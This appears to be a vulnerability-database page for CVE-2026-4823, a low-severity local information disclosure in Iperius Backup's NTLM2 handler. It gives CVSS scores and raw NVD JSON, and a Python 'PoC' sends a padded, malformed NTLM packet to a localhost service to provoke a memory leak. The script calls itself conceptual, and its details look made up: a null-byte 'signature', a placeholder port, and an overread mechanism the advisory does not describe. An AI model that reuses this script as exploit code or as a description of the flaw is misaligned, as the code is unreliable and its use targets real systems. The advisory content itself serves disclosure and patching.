Security Vulnerability Report
CVE-2026-4823 CVSS 2.5 LOW

CVE-2026-4823

Published: 2026-03-25 22:16:19
Last Modified: 2026-04-29 01:00:02

Description

A flaw has been found in Enter Software Iperius Backup up to 8.7.3. Affected by this vulnerability is an unknown functionality of the component NTLM2 Handler. Executing a manipulation can lead to information disclosure. The attack is restricted to local execution. Attacks of this nature are highly complex. The exploitation appears to be difficult. The exploit has been published and may be used. Upgrading to version 8.7.4 addresses this issue. Upgrading the affected component is advised. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.

CVSS Details

CVSS Score: 2.5
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Enter Software Iperius Backup <= 8.7.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Concept for CVE-2026-4823 (Local Information Disclosure)
# This script is a conceptual demonstration of triggering the NTLM2 Handler flaw.
# Note: Actual exploitation requires local access and specific environment conditions.
import socket
import struct
import sys


def send_malicious_ntlm_packet(target_ip, target_port):
    """
    Sends a crafted packet to the local Iperius Backup service
    to trigger the information disclosure in NTLM2 Handler.
    """
    try:
        print(f"[*] Connecting to {target_ip}:{target_port}...")
        # Establish a connection to the local vulnerable service
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((target_ip, target_port))

        # Craft a malformed NTLM negotiation message
        # This payload is designed to trigger the buffer read overflow
        # leading to memory leak.
        payload = b"\x00" * 8   # Signature
        payload += b"\x01" * 4  # Message Type (Negotiate)
        payload += b"\xFF" * 4  # Flags (Malformed)
        payload += b"A" * 1024  # Padding to trigger read boundary issue

        print("[*] Sending malicious payload...")
        sock.sendall(payload)

        # Receive response
        response = sock.recv(4096)
        if response:
            print("[+] Response received:")
            print(response)
            # Check for leaked memory patterns (e.g., pointers, strings)
            if b"\x00\x00\x00\x00" in response or len(response) > 100:
                print("[!] Potential memory leak detected!")
            else:
                print("[-] No obvious leak detected in this attempt.")
        else:
            print("[-] No response from server.")
        sock.close()
    except Exception as e:
        print(f"[!] Error during exploitation: {e}")


if __name__ == "__main__":
    # Target is localhost as this is a Local (AV:L) vulnerability
    TARGET_IP = "127.0.0.1"
    TARGET_PORT = 0000  # Replace with actual service port if known
    if len(sys.argv) > 1:
        TARGET_PORT = int(sys.argv[1])
    else:
        print("Usage: python poc.py <port>")
        print("Attempting with default placeholder port...")
    send_malicious_ntlm_packet(TARGET_IP, TARGET_PORT)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4823", "sourceIdentifier": "[email protected]", "published": "2026-03-25T22:16:19.280", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Enter Software Iperius Backup up to 8.7.3. Affected by this vulnerability is an unknown functionality of the component NTLM2 Handler. Executing a manipulation can lead to information disclosure. The attack is restricted to local execution. Attacks of this nature are highly complex. The exploitation appears to be difficult. The exploit has been published and may be used. Upgrading to version 8.7.4 addresses this issue. Upgrading the affected component is advised. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product."}, {"lang": "es", "value": "Se ha encontrado una falla en Enter Software Iperius Backup hasta la versión 8.7.3. Afectada por esta vulnerabilidad es una funcionalidad desconocida del componente Gestor NTLM2. La ejecución de una manipulación puede llevar a la revelación de información. El ataque está restringido a la ejecución local. Los ataques de esta naturaleza son altamente complejos. La explotación parece ser difícil. El exploit ha sido publicado y puede ser utilizado. La actualización a la versión 8.7.4 soluciona este problema. Se aconseja actualizar el componente afectado. 
Se contactó al proveedor con antelación, respondió de manera muy profesional y rápidamente lanzó una versión corregida del producto afectado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.1, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.5, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", 
"userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:H/Au:S/C:P/I:N/A:N", "baseScore": 1.0, "accessVector": "LOCAL", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 1.5, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/0truust/iperius-backup-security-advisories/blob/main/advisories/ntlm-relay-credential-exposure.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.353123", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.353123", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.774218", "source": "[email protected]"}, {"url": "https://www.iperiusbackup.com/download-software-backup.aspx", "source": "[email protected]"}]}}